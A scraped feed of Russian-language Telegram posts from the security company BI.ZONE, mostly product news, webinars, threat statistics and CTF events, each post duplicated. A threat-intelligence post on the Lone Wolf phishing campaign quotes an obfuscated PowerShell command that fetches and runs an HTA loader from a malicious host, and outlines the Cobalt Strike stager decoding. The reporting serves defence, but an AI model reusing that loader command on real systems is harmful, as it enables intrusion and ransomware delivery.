23.04.202513:19
⚡️ Выложили запись вебинара «BI.ZONE EDR: на шаг впереди инцидента»
Рассказали, какие функции появились у решения за последнее время и как они помогут укрепить защиту конечных точек.
Из видео вы узнаете о новых возможностях сбора телеметрии, мониторинга и автоматического реагирования.
Смотреть запись
Рассказали, какие функции появились у решения за последнее время и как они помогут укрепить защиту конечных точек.
Из видео вы узнаете о новых возможностях сбора телеметрии, мониторинга и автоматического реагирования.
Смотреть запись


22.04.202511:41
🔍 Самые популярные и необычные способы пивотинга
Чтобы проникнуть в важные сегменты, злоумышленники могут прибегать к пивотингу. Эта техника позволяет использовать скомпрометированное устройство для дальнейшего проникновения в сеть.
В новой статье мы рассказали:
🔵как работает пивотинг,
🔵какие методы встречались в 2024 году чаще всего,
🔵какие необычные способы скоро могут стать популярными.
➡️Читать статью
Чтобы проникнуть в важные сегменты, злоумышленники могут прибегать к пивотингу. Эта техника позволяет использовать скомпрометированное устройство для дальнейшего проникновения в сеть.
В новой статье мы рассказали:
🔵как работает пивотинг,
🔵какие методы встречались в 2024 году чаще всего,
🔵какие необычные способы скоро могут стать популярными.
➡️Читать статью
11.04.202513:02
▶️ Что важно знать об identity security
Делимся конспектом и записью эфира AM Live, где эксперты обсудили:
🔵задачи, которые решает identity security,
🔵типичные ошибки при внедрении,
🔵ключевые векторы развития в ближайшие 1–2 года.
Будет полезно всем, кто отвечает за архитектуру доступа, IAM, PAM, киберзащиту и управление учетными записями.
Читать конспект и смотреть видео
Делимся конспектом и записью эфира AM Live, где эксперты обсудили:
🔵задачи, которые решает identity security,
🔵типичные ошибки при внедрении,
🔵ключевые векторы развития в ближайшие 1–2 года.
Будет полезно всем, кто отвечает за архитектуру доступа, IAM, PAM, киберзащиту и управление учетными записями.
Читать конспект и смотреть видео
11.03.202509:34
🌜 Разобрали до кварков: вышла запись эфира «Киберразведка решает все»
В студии AM Live поговорили о threat intelligence. Эксперты разобрали, как киберразведданные помогают компаниям выявлять угрозы на ранней стадии и предупреждать атаки до того, как они нанесут ущерб. А также обсудили, как правильно:
🟦применять киберразведданные,
🟦выстроить непрерывный процесс киберразведки,
🟦внедрить актуальные подходы к сбору данных и управлению процессами.
Смотреть запись
Читать обзор эфира
А еще напоминаем, что недавно вышло обновление BI.ZONE Threat Intelligence. С новым инструментом «Теневые ресурсы» компаниям будет проще предсказывать кибератаки и минимизировать последствия утечек.
В студии AM Live поговорили о threat intelligence. Эксперты разобрали, как киберразведданные помогают компаниям выявлять угрозы на ранней стадии и предупреждать атаки до того, как они нанесут ущерб. А также обсудили, как правильно:
🟦применять киберразведданные,
🟦выстроить непрерывный процесс киберразведки,
🟦внедрить актуальные подходы к сбору данных и управлению процессами.
Смотреть запись
Читать обзор эфира
А еще напоминаем, что недавно вышло обновление BI.ZONE Threat Intelligence. С новым инструментом «Теневые ресурсы» компаниям будет проще предсказывать кибератаки и минимизировать последствия утечек.
06.02.202512:06


04.02.202513:02
💡 Пять наиболее распространенных веб-угроз в 2024 году
Команда BI.ZONE WAF проанализировала веб-атаки за прошедший год и выделила самые популярные из них.
1. RCE-атаки
Их доля составила 36% от общего числа веб-угроз.
У атаки с удаленным исполнением кода самые опасные последствия: злоумышленник может полностью захватить контроль над сервером веб-приложения.
2. Разведывательные атаки
Сюда относятся нелегитимные запросы от утилит, которые автоматизированно ищут слабые места в коде.
По сравнению с первой половиной года доля таких атак выросла втрое — с 6,8% до 22%. А по итогам года она составила 16%. Рост может быть связан с распространением инструментов на базе ИИ и машинного обучения.
3. Попытки получить доступ к файлам конфигурации, логам сервера
Один из примеров — атака обхода пути (path traversal).
На подобные угрозы пришлось 16%. Они чаще всего фиксировались в запросах к ресурсам транспортных и логистических компаний (73% от всех атак).
4. Атаки, направленные на кражу данных посетителей сайта
Среди них межсайтовый скриптинг, расщепление HTTP‑запроса, загрязнение прототипа и т. д.
По итогам года доля таких атак составила 14%. Чаще всего с ними сталкивались государственные организации (66%), телекоммуникационные компании (37%) и образовательные учреждения (30%).
5. Попытки получить доступ к базе данных
Самый известный пример — SQL-инъекции.
Доля подобных атак — 10% от общего числа веб-угроз. В 2024 году они были чаще всего нацелены на организации в сфере ритейла (26%) и финансов (11%).
Подробнее читайте на сайте.
Команда BI.ZONE WAF проанализировала веб-атаки за прошедший год и выделила самые популярные из них.
1. RCE-атаки
Их доля составила 36% от общего числа веб-угроз.
У атаки с удаленным исполнением кода самые опасные последствия: злоумышленник может полностью захватить контроль над сервером веб-приложения.
2. Разведывательные атаки
Сюда относятся нелегитимные запросы от утилит, которые автоматизированно ищут слабые места в коде.
По сравнению с первой половиной года доля таких атак выросла втрое — с 6,8% до 22%. А по итогам года она составила 16%. Рост может быть связан с распространением инструментов на базе ИИ и машинного обучения.
3. Попытки получить доступ к файлам конфигурации, логам сервера
Один из примеров — атака обхода пути (path traversal).
На подобные угрозы пришлось 16%. Они чаще всего фиксировались в запросах к ресурсам транспортных и логистических компаний (73% от всех атак).
4. Атаки, направленные на кражу данных посетителей сайта
Среди них межсайтовый скриптинг, расщепление HTTP‑запроса, загрязнение прототипа и т. д.
По итогам года доля таких атак составила 14%. Чаще всего с ними сталкивались государственные организации (66%), телекоммуникационные компании (37%) и образовательные учреждения (30%).
5. Попытки получить доступ к базе данных
Самый известный пример — SQL-инъекции.
Доля подобных атак — 10% от общего числа веб-угроз. В 2024 году они были чаще всего нацелены на организации в сфере ритейла (26%) и финансов (11%).
Подробнее читайте на сайте.
23.04.202511:41
🌝 Атаки с дорогими последствиями и защита за пределами веб-приложений
Наши эксперты выступили на CISO FORUM 2025 с докладами об актуальных угрозах и ошибочных подходах к безопасности.
Смотрите видео выступлений:
🔵Дешевые атаки с дорогими последствиями
Почему атаковать стало проще, какие инструменты используют злоумышленники и как бизнесу защититься от самых доступных способов вторжения.
🔵За пределами веба. Комплексная защита инфраструктуры от DDoS-атак
Как выглядит современная DDoS-атака, что остается незамеченным за периметром веб-приложений и зачем проводить регулярные стресс-тесты инфраструктуры.
В фокусе обоих докладов — реальные риски для бизнеса, кейсы, а также подходы, которые мы используем на практике.
Наши эксперты выступили на CISO FORUM 2025 с докладами об актуальных угрозах и ошибочных подходах к безопасности.
Смотрите видео выступлений:
🔵Дешевые атаки с дорогими последствиями
Почему атаковать стало проще, какие инструменты используют злоумышленники и как бизнесу защититься от самых доступных способов вторжения.
🔵За пределами веба. Комплексная защита инфраструктуры от DDoS-атак
Как выглядит современная DDoS-атака, что остается незамеченным за периметром веб-приложений и зачем проводить регулярные стресс-тесты инфраструктуры.
В фокусе обоих докладов — реальные риски для бизнеса, кейсы, а также подходы, которые мы используем на практике.


21.04.202513:32
🚀 Еще больше возможностей для управления распределенной сетью
В новой версии BI.ZONE Secure SD-WAN мы повысили отказоустойчивость сетевой инфраструктуры и добавили полезные функции для распределенных компаний.
Что появилось:
🔵8 одновременно работающих интернет-каналов (NxWAN) вместо 2
Это повышает отказоустойчивость и дает больше гибкости при масштабировании.
🔵Географическое резервирование контроллеров
Их можно развернуть в разных локациях, но подключены они будут к одной инфраструктуре. При сбое основного контроллера система автоматически переключается на резервный.
🔵Кластер из двух сетевых устройств
Если одно устройство выходит из строя, второе продолжает работу. Это значимо для критически важных сервисов.
Обновление особенно актуально для организаций с высокими требованиями к доступности: банков, компаний из сфер здравоохранения, промышленности, телекома.
Подробнее
В новой версии BI.ZONE Secure SD-WAN мы повысили отказоустойчивость сетевой инфраструктуры и добавили полезные функции для распределенных компаний.
Что появилось:
🔵8 одновременно работающих интернет-каналов (NxWAN) вместо 2
Это повышает отказоустойчивость и дает больше гибкости при масштабировании.
🔵Географическое резервирование контроллеров
Их можно развернуть в разных локациях, но подключены они будут к одной инфраструктуре. При сбое основного контроллера система автоматически переключается на резервный.
🔵Кластер из двух сетевых устройств
Если одно устройство выходит из строя, второе продолжает работу. Это значимо для критически важных сервисов.
Обновление особенно актуально для организаций с высокими требованиями к доступности: банков, компаний из сфер здравоохранения, промышленности, телекома.
Подробнее
Пераслаў з:
OFFZONE

08.04.202515:05
⚡️ Всё о нашем CFP
Совсем скоро мы откроем наш традиционный call for papers. Каждый год нас спрашивают, как стать спикером на нашей конференции, и задают еще кучу вопросов.
Как работает прием заявок? Почему мой доклад не приняли и что с этим делать? А мерч за выступление дадите? Дадим :) А какой? И так далее.
Чтобы call for papers был для вас более прозрачным, подробно рассказали о нем на «Хабре».
А еще на нашем сайте есть FAQ, где собраны ответы на все вопросы про OFFZONE.
Совсем скоро мы откроем наш традиционный call for papers. Каждый год нас спрашивают, как стать спикером на нашей конференции, и задают еще кучу вопросов.
Как работает прием заявок? Почему мой доклад не приняли и что с этим делать? А мерч за выступление дадите? Дадим :) А какой? И так далее.
Чтобы call for papers был для вас более прозрачным, подробно рассказали о нем на «Хабре».
А еще на нашем сайте есть FAQ, где собраны ответы на все вопросы про OFFZONE.


07.02.202510:42
⚡️ Сбер внедрил BI.ZОNE PAM
Вместо зарубежной системы по управлению привилегированным доступом Сбер внедрил отечественное решение BI.ZONE PAM.
Благодаря ему тысячам IT-специалистов Сбера станет удобнее работать с критическими системами.
Вот что получила компания:
🟦Контроль прав привилегированных пользователей, мониторинг их активности и передача данных в SIEM.
🟦Масштабирование инсталляции на всю цифровую инфраструктуру.
🟦Меньше действий DevOps-, SRE-инженеров и администраторов для подключения сразу к множеству объектов инфраструктуры.
Наши эксперты помогли Сберу составить дорожную карту с учетом потребностей компании, что сделало внедрение BI.ZONE PAM поэтапным и бесшовным.
Подробнее о сотрудничестве
Вместо зарубежной системы по управлению привилегированным доступом Сбер внедрил отечественное решение BI.ZONE PAM.
Благодаря ему тысячам IT-специалистов Сбера станет удобнее работать с критическими системами.
Вот что получила компания:
🟦Контроль прав привилегированных пользователей, мониторинг их активности и передача данных в SIEM.
🟦Масштабирование инсталляции на всю цифровую инфраструктуру.
🟦Меньше действий DevOps-, SRE-инженеров и администраторов для подключения сразу к множеству объектов инфраструктуры.
Наши эксперты помогли Сберу составить дорожную карту с учетом потребностей компании, что сделало внедрение BI.ZONE PAM поэтапным и бесшовным.
Подробнее о сотрудничестве


06.02.202508:21
😈😈😈😈😈😈😈😈
Российский ландшафт киберугроз на 187 страницах
Мы работали над этим весь прошлый год. Представляем Threat Zone 2025 — исследование киберландшафта России и СНГ.
Что вы найдете в материале:
🔵Профили группировок.
🔵Особенности ландшафта киберугроз.
🔵Список самых атакуемых отраслей.
🔵Популярные методы получения первоначального доступа.
🔵Топ-10 техник злоумышленников.
Исследование поможет вам ориентироваться в динамике угроз, понимать мотивацию злоумышленников и их подходы.
И смотрите видео с презентацией материала в посте.
Скачать бесплатно
Российский ландшафт киберугроз на 187 страницах
Мы работали над этим весь прошлый год. Представляем Threat Zone 2025 — исследование киберландшафта России и СНГ.
Что вы найдете в материале:
🔵Профили группировок.
🔵Особенности ландшафта киберугроз.
🔵Список самых атакуемых отраслей.
🔵Популярные методы получения первоначального доступа.
🔵Топ-10 техник злоумышленников.
Исследование поможет вам ориентироваться в динамике угроз, понимать мотивацию злоумышленников и их подходы.
И смотрите видео с презентацией материала в посте.
Скачать бесплатно
04.02.202511:29
🚀 Большое обновление BI.ZONE PAM
Фокус версии 2.0 — улучшение пользовательского опыта.
Администраторам BI.ZONE PAM теперь удобнее управлять привилегированным доступом, а пользователям — безопасно работать с серверами и другими критическими IT-ресурсами.
Вот что появилось в версии 2.0:
🟦Кеширование второго фактора аутентификации при подключении через протоколы SSH и RDP.
🟦Поддержка Ansible playbook — популярного инструмента автоматизации DevOps-задач.
🟦Новые возможности работы с записями сессий.
🟦Расширенный интерфейс управления пользователями, секретами, конфигурацией решения, в том числе максимально гибкая настройка ролевой модели.
Подробнее об обновлении
Фокус версии 2.0 — улучшение пользовательского опыта.
Администраторам BI.ZONE PAM теперь удобнее управлять привилегированным доступом, а пользователям — безопасно работать с серверами и другими критическими IT-ресурсами.
Вот что появилось в версии 2.0:
🟦Кеширование второго фактора аутентификации при подключении через протоколы SSH и RDP.
🟦Поддержка Ansible playbook — популярного инструмента автоматизации DevOps-задач.
🟦Новые возможности работы с записями сессий.
🟦Расширенный интерфейс управления пользователями, секретами, конфигурацией решения, в том числе максимально гибкая настройка ролевой модели.
Подробнее об обновлении
23.04.202509:03
💼 BI.ZONE GRC на CISO FORUM 2025: как мы строим киберзащиту для крупных компаний
На CISO FORUM 2025 мы пообщались с Андреем Быковым, руководителем BI.ZONE GRC.
Он рассказал:
🟦Почему управление IT-активами — основа защиты бизнеса.
🟦Как автоматизировать процессы кибербезопасности в крупных холдингах.
🟦Как наш клиент за 2,5 года кратно вырастил уровень зрелости безопасности в группе из 200+ компаний.
➡️Смотреть интервью
Вы можете запросить бесплатное демо BI.ZONE GRC, чтобы оценить решение на практике.
На CISO FORUM 2025 мы пообщались с Андреем Быковым, руководителем BI.ZONE GRC.
Он рассказал:
🟦Почему управление IT-активами — основа защиты бизнеса.
🟦Как автоматизировать процессы кибербезопасности в крупных холдингах.
🟦Как наш клиент за 2,5 года кратно вырастил уровень зрелости безопасности в группе из 200+ компаний.
➡️Смотреть интервью
Вы можете запросить бесплатное демо BI.ZONE GRC, чтобы оценить решение на практике.


21.04.202511:04
🌕 Как Watch Wolf атакует российский бизнес
На фоне громких кибератак на крупные компании деятельность небольших группировок заметна меньше. Но она тоже наносит серьезный ущерб.
Одна из таких — кластер Watch Wolf в таксономии BI.ZONE Threat Intelligence, также известный как Buhtrap. Участники этой группировки атакуют преимущественно средний и малый бизнес.
Мы уже рассказывали об одном из инцидентов, а теперь делимся полноценным исследованием кластера от команды BI.ZONE DFIR.
Что внутри:
🔵Подробное описание жизненного цикла атак.
🔵Известные кампании.
🔵Используемые инструменты.
🔵Меры защиты от злоумышленников.
➡️Скачать исследование
На фоне громких кибератак на крупные компании деятельность небольших группировок заметна меньше. Но она тоже наносит серьезный ущерб.
Одна из таких — кластер Watch Wolf в таксономии BI.ZONE Threat Intelligence, также известный как Buhtrap. Участники этой группировки атакуют преимущественно средний и малый бизнес.
Мы уже рассказывали об одном из инцидентов, а теперь делимся полноценным исследованием кластера от команды BI.ZONE DFIR.
Что внутри:
🔵Подробное описание жизненного цикла атак.
🔵Известные кампании.
🔵Используемые инструменты.
🔵Меры защиты от злоумышленников.
➡️Скачать исследование


20.03.202512:24
🌝 Эффективная логика обнаружения угроз в SOC
Детектирующая логика — основа мониторинга и реагирования на киберугрозы. К ней относится любой контент, позволяющий выявлять атаки:
🔵правила корреляции в SIEM-системе,
🔵сигнатуры NTA,
🔵правила обнаружения EDR,
🔵YARA-правила и т. д.
За семь лет работы нашего SOC мы собрали большую базу контента. Используем ее не только в BI.ZONE TDR, но и для того, чтобы помогать другим компаниям строить свой собственный центр мониторинга.
В статье, посвященной детектирующей логике, рассказали:
🟦про этапы разработки контента,
🟦формирование идей и гипотез,
🟦критерии эффективности правил.
Читать статью
Детектирующая логика — основа мониторинга и реагирования на киберугрозы. К ней относится любой контент, позволяющий выявлять атаки:
🔵правила корреляции в SIEM-системе,
🔵сигнатуры NTA,
🔵правила обнаружения EDR,
🔵YARA-правила и т. д.
За семь лет работы нашего SOC мы собрали большую базу контента. Используем ее не только в BI.ZONE TDR, но и для того, чтобы помогать другим компаниям строить свой собственный центр мониторинга.
В статье, посвященной детектирующей логике, рассказали:
🟦про этапы разработки контента,
🟦формирование идей и гипотез,
🟦критерии эффективности правил.
Читать статью
06.02.202512:06
🌜 Разбираем самое интересное из Threat Zone 2025
13 февраля в 11:00 проведем онлайн-презентацию нового исследования.
Расскажем:
🔵Что появилось в арсенале кластеров активности, нацеленных на российские организации.
🔵Какие особенности в атаках на компании наблюдают специалисты киберразведки.
🔵Как изменилась мотивация злоумышленников.
А еще ответим на вопросы об исследовании киберугроз. Пишите их в специальном поле при регистрации на мероприятие.
Среди авторов самых интересных вопросов разыграем печатные экземпляры исследования и другие призы!
Ведущие:
🟦Олег Скулкин, руководитель BI.ZОNE Threat Intelligence.
🟦Дмитрий Купин, руководитель отдела исследования киберугроз и вредоносного кода, BI.ZОNE Threat Intelligence.
Зарегистрироваться
13 февраля в 11:00 проведем онлайн-презентацию нового исследования.
Расскажем:
🔵Что появилось в арсенале кластеров активности, нацеленных на российские организации.
🔵Какие особенности в атаках на компании наблюдают специалисты киберразведки.
🔵Как изменилась мотивация злоумышленников.
А еще ответим на вопросы об исследовании киберугроз. Пишите их в специальном поле при регистрации на мероприятие.
Среди авторов самых интересных вопросов разыграем печатные экземпляры исследования и другие призы!
Ведущие:
🟦Олег Скулкин, руководитель BI.ZОNE Threat Intelligence.
🟦Дмитрий Купин, руководитель отдела исследования киберугроз и вредоносного кода, BI.ZОNE Threat Intelligence.
Зарегистрироваться
05.02.202515:14
⭐️ Сколько микроГоферов в одной килострочке кода на Go?
Мы не знаем :)
Но знаем, что у нашего CTF-кружка вышла новая серия лекций. На этот раз разбираем по полочкам язык Go.
Вот записи всех четырех уроков:
1. Язык Go: знакомство.
2. Язык Go: еще больше конструкций.
3. Язык Go: memory.
4. Язык Go: asynchronous programming.
Впереди еще много интересных тем, не переключайтесь!
Мы не знаем :)
Но знаем, что у нашего CTF-кружка вышла новая серия лекций. На этот раз разбираем по полочкам язык Go.
Вот записи всех четырех уроков:
1. Язык Go: знакомство.
2. Язык Go: еще больше конструкций.
3. Язык Go: memory.
4. Язык Go: asynchronous programming.
Впереди еще много интересных тем, не переключайтесь!


04.02.202509:17
🔧 Прокачиваемся в безопасной разработке веб-приложений
Наш с CyberED курс «Основы безопасной разработки» практический и охватывает основные темы, после каждого урока есть тесты и задания. Обучение включает 71 академический час материала и разбито на 5 модулей.
Рассказываем, что ваши сотрудники получат в результате прохождения каждого:
🔷Модуль 0
Познакомятся с основными понятиями кибербезопасности, а также фреймворками и методологиями безопасной разработки.
🔷Модуль 1
Изучат уязвимости веб‑приложений, их классификацию, причины возникновения и способы митигации.
🔷Модуль 2
Рассмотрят функции безопасности, включая протоколы HTTP, SSL/TLS, PKI, сессии, механизмы аутентификации и авторизации, взаимодействия с СУБД, а также особенности их реализации.
🔷Модуль 3
Научатся обеспечивать безопасность Docker, Kubernetes, окружения приложений и хранения информации, грамотно настраивать элементы приложений, использовать Ansible и CIS Benchmark, Nginx, работать с HashiCorp Vault.
🔷Модуль 4
Познакомятся с практиками SSDLC на всех этапах разработки.
Посмотреть всю программу и бесплатный демоурок
Наш с CyberED курс «Основы безопасной разработки» практический и охватывает основные темы, после каждого урока есть тесты и задания. Обучение включает 71 академический час материала и разбито на 5 модулей.
Рассказываем, что ваши сотрудники получат в результате прохождения каждого:
🔷Модуль 0
Познакомятся с основными понятиями кибербезопасности, а также фреймворками и методологиями безопасной разработки.
🔷Модуль 1
Изучат уязвимости веб‑приложений, их классификацию, причины возникновения и способы митигации.
🔷Модуль 2
Рассмотрят функции безопасности, включая протоколы HTTP, SSL/TLS, PKI, сессии, механизмы аутентификации и авторизации, взаимодействия с СУБД, а также особенности их реализации.
🔷Модуль 3
Научатся обеспечивать безопасность Docker, Kubernetes, окружения приложений и хранения информации, грамотно настраивать элементы приложений, использовать Ansible и CIS Benchmark, Nginx, работать с HashiCorp Vault.
🔷Модуль 4
Познакомятся с практиками SSDLC на всех этапах разработки.
Посмотреть всю программу и бесплатный демоурок


22.04.202513:37
🌛 CVE-2025-24364 и CVE-2025-24365: анализируем уязвимости в Vaultwarden
По данным BI.ZONE TDR, в 2025 году Vaultwarden использует каждая десятая российская компания.
Поскольку секреты от других внутренних сервисов хранятся в Vaultwarden, при его взломе атакующий узнает и их. А если продукт автоматически получает секреты с помощью API, злоумышленник попадет на хост с обширной сетевой связностью.
Наша группа исследования уязвимостей проанализировала Vaultwarden. В результате мы обнаружили две уязвимости высокого уровня опасности: CVE-2025-24364 и CVE-2025-24365.
В статье разобрали, как устроены эти уязвимости, и дали рекомендации, как избежать их эксплуатации.
По данным BI.ZONE TDR, в 2025 году Vaultwarden использует каждая десятая российская компания.
Поскольку секреты от других внутренних сервисов хранятся в Vaultwarden, при его взломе атакующий узнает и их. А если продукт автоматически получает секреты с помощью API, злоумышленник попадет на хост с обширной сетевой связностью.
Наша группа исследования уязвимостей проанализировала Vaultwarden. В результате мы обнаружили две уязвимости высокого уровня опасности: CVE-2025-24364 и CVE-2025-24365.
В статье разобрали, как устроены эти уязвимости, и дали рекомендации, как избежать их эксплуатации.
21.04.202508:56
▶️ Делимся записью эфира «Коммерческий или гибридный SOC?»
В недавнем эфире AM Live эксперты разобрали:
🔵в чем плюсы и минусы разных подходов к обеспечению мониторинга и реагирования;
🔵как оценить эффективность гибридного и коммерческого SOC и различаются ли критерии;
🔵на что обратить внимание при переходе от одной модели к другой.
Видео будет полезно тем, кто строит либо развивает SOC, думает о смене модели или просто хочет свериться с лучшими практиками.
➡️Смотреть запись
Если у вас уже есть собственный SOC, пройдите наше бесплатное тестирование по оценке зрелости. После прохождения вы получите рекомендации, что и как можно улучшить.
В недавнем эфире AM Live эксперты разобрали:
🔵в чем плюсы и минусы разных подходов к обеспечению мониторинга и реагирования;
🔵как оценить эффективность гибридного и коммерческого SOC и различаются ли критерии;
🔵на что обратить внимание при переходе от одной модели к другой.
Видео будет полезно тем, кто строит либо развивает SOC, думает о смене модели или просто хочет свериться с лучшими практиками.
➡️Смотреть запись
Если у вас уже есть собственный SOC, пройдите наше бесплатное тестирование по оценке зрелости. После прохождения вы получите рекомендации, что и как можно улучшить.


12.03.202513:00
🦴 Вы задолжали Lone Wolf: атакующие рассылают загрузчик Cobalt Strike под видом документов о финансовой задолженности
С начала марта злоумышленники из Lone Wolf реализовали несколько фишинговых кампаний.
Письма с темой «
Интересно, что для обхода автоматизированных средств защиты, умеющих «подставлять» пароль из тела письма для сканирования вложений, злоумышленники использовали фразу «пароль к архиву одна единица».
Внутри архива — ярлык Windows «
1. PowerShell-скрипт, содержащийся в LNK-файле, загружал HTA-файл по ссылке zetag[.]ru/z[.]hta.
2. Файл z.hta, содержащий закодированный с помощью Base64 и запакованный утилитой GZIP PowerShell-скрипт, декодировал еще одну стадию — снова PowerShell-скрипт.
3. Шелл-код с экземпляром Cobalt Strike Stager декодировался сначала с помощью Base64, потом путем операции XOR с ключом 0x35 и внедрялся в адресное пространство процесса PowerShell.
Полученный доступ к корпоративным сетям злоумышленники использовали для распространения программ-вымогателей.
С начала марта злоумышленники из Lone Wolf реализовали несколько фишинговых кампаний.
Письма с темой «
Актуальная задолженность(просроченная)
» рассылались в российские логистические, производственные, финансовые организации и компании из сферы розничной торговли. К письму был прикреплен запароленный архив «выписка.zip
». Интересно, что для обхода автоматизированных средств защиты, умеющих «подставлять» пароль из тела письма для сканирования вложений, злоумышленники использовали фразу «пароль к архиву одна единица».
Внутри архива — ярлык Windows «
Выписка.lnk
». При его открытии жертвой происходила компрометация системы, а на устройство загружался Cobalt Strike Stager в следующей последовательности: 1. PowerShell-скрипт, содержащийся в LNK-файле, загружал HTA-файл по ссылке zetag[.]ru/z[.]hta.
powershell .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://zetag[.]ru/z.hta
2. Файл z.hta, содержащий закодированный с помощью Base64 и запакованный утилитой GZIP PowerShell-скрипт, декодировал еще одну стадию — снова PowerShell-скрипт.
3. Шелл-код с экземпляром Cobalt Strike Stager декодировался сначала с помощью Base64, потом путем операции XOR с ключом 0x35 и внедрялся в адресное пространство процесса PowerShell.
Полученный доступ к корпоративным сетям злоумышленники использовали для распространения программ-вымогателей.
06.02.202512:06
05.02.202509:11
🔒 Введите пароль: qwerty1234
По нашим данным, в 2024 году каждый третий высококритичный киберинцидент в российских компаниях был связан с компрометацией паролей от учетных записей администраторов.
Топ самых распространенных паролей, которые команда BI.ZONE Brand Protection обнаружила в утечках за последние полгода:
🟦123456
🟦123456789
🟦test1
🟦admin
Чтобы создать сильный пароль, советуем использовать парольные фразы, например uLUKd3_Zcndt («У лукоморья дуб зеленый, златая цепь на дубе том»). А хранить такие сложные комбинации лучше в парольных менеджерах.
Другие способы создать надежный пароль — в статье на CISOCLUB.
Если вы хотите узнать, есть ли в вашей организации утекшие пароли, BI.ZONE Brand Protection покажет все скомпрометированные учетные записи. Это позволит превентивно сменить доступы и избежать возможных инцидентов.
По нашим данным, в 2024 году каждый третий высококритичный киберинцидент в российских компаниях был связан с компрометацией паролей от учетных записей администраторов.
Топ самых распространенных паролей, которые команда BI.ZONE Brand Protection обнаружила в утечках за последние полгода:
🟦123456
🟦123456789
🟦test1
🟦admin
Чтобы создать сильный пароль, советуем использовать парольные фразы, например uLUKd3_Zcndt («У лукоморья дуб зеленый, златая цепь на дубе том»). А хранить такие сложные комбинации лучше в парольных менеджерах.
Другие способы создать надежный пароль — в статье на CISOCLUB.
Если вы хотите узнать, есть ли в вашей организации утекшие пароли, BI.ZONE Brand Protection покажет все скомпрометированные учетные записи. Это позволит превентивно сменить доступы и избежать возможных инцидентов.
10.12.202415:14
🚀 Делимся программой BI.ZONE x MEPhI CTF Meetup #3
Мы давно не говорили про CTF, очень соскучились по сообществу и хорошим докладам. Поэтому подготовили по-настоящему легендарный состав спикеров и тем.
Вот какие доклады вас ждут:
🔵Бинари на AD. Взгляд разработчика и игрока
Георгий Кигурадзе, старший специалист по безопасности приложений, «Лаборатория Касперского»
🔵Hitchhiker's guide to Browser Exploitation
Теодор-Арсений Ларионов-Тришкин, независимый эксперт, участник команды Drovosec
🔵CTF в России
Виктор Минин, председатель правления АРСИБ
🔵А минимальное знание вашего OWASP позволяет мне писать бездырные приложения
Елизар Батин, старший специалист по исследованию уязвимостей, BI.ZONE
🔵Трассировщики, которые я знал и любил
Тимофей Мищенко, инженер по безопасности, Wildberries
До митапа осталась всего неделя. Вы еще успеваете зарегистрироваться. Ждем вас!
P. S. Количество мест ограничено.
Мы давно не говорили про CTF, очень соскучились по сообществу и хорошим докладам. Поэтому подготовили по-настоящему легендарный состав спикеров и тем.
Вот какие доклады вас ждут:
🔵Бинари на AD. Взгляд разработчика и игрока
Георгий Кигурадзе, старший специалист по безопасности приложений, «Лаборатория Касперского»
🔵Hitchhiker's guide to Browser Exploitation
Теодор-Арсений Ларионов-Тришкин, независимый эксперт, участник команды Drovosec
🔵CTF в России
Виктор Минин, председатель правления АРСИБ
🔵А минимальное знание вашего OWASP позволяет мне писать бездырные приложения
Елизар Батин, старший специалист по исследованию уязвимостей, BI.ZONE
🔵Трассировщики, которые я знал и любил
Тимофей Мищенко, инженер по безопасности, Wildberries
До митапа осталась всего неделя. Вы еще успеваете зарегистрироваться. Ждем вас!
P. S. Количество мест ограничено.
Паказана 1 - 24 з 24
Увайдзіце, каб разблакаваць больш функцый.